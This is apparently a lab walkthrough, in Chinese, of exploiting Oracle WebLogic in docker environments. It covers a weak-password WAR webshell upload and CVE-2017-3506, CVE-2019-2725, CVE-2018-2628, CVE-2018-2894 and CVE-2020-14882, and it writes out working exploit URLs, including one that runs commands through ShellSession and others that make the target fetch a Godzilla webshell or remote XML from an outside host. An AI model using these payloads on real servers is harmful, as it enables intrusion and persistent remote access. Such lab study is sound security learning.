一、后台弱口令GetShell
1、开环境
2、访问目录
console/login/LoginForm.jsp
3、登录后台
通过弱口令登录后台
weblogic/Oracle@123
4、上传war包
部署-安装-上载文件
上传一个war包,然后一直下一步
去访问我们的木马文件
5、测试连接
二、CVE-2017-3506
1、开环境
环境就是上一个的环境不用变,访问目录即可
/wls-wsat/CoordinatorPortType
2、在当前页抓包,添加请求包
改为POST传参,文件类型改为text/xml,添加请求包
3、在服务器开启监听
把修改好的包发送出去
4、监听成功
三、CVE-2019-2725
1、开环境
还是上一个的环境,需要访问目录
_async/AsyncResponseService
2、在当前页抓包,添加请求包
改为POST传参,修改文件类型为text/xml,添加请求包
请求包中的150.158.199.164/1.txt代表着把我们网站的根目录下的1.txt上传到他的电脑上,并重命名为wjf.jsp
3、在我们网站的根目录上传一个1.txt文件,里面放的是哥斯拉生成的木马
4、发送数据包
5、访问我们上传的wjf.jsp文件
/bea_wls_internal/wjf.jsp
6、测试连接
四、CVE-2018-2628
1、开环境
2、利用工具
输入网址,检查
存在漏洞之后执行命令
五、CVE-2018-2894
1、开环境
访问路径/console/login/LoginForm.jsp
2、获取密码
docker-compose logs | grep password
3、登录
4、设置服务开启
域结构——base-domain——高级——启动WEB服务测试页——保存
5、进入config.do 文件进行设置
/ws_utc/config.do
修改目录,保存
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
6、安全,添加文件
7、访问目录
150.158.199.164:7001/ws_utc/config/keystore/1742717964975_1.jsp
f12,点左边的小箭头,再点上面的1,就可以显示出来id
访问地址
/ws_utc/css/config/keystore/1742717964975_1.jsp
8、得知文件已经上传,测试连接
六、CVE-2020-14882
1、开环境
2、访问目录
需要使用一下URL绕过
/console/css/%252e%252e%252fconsole.portal
3、在云服务器上执行命令,进入容器
docker exec -it 容器id /bin/bash
进来之后输入URL
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")
执行命令ls /tmp
可以看到success已经在里面了
还有一种方法
在我们的服务器新建一个xml文件
监听端口6666
访问文件,监听端口
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://150.158.199.164:7001/2.xml")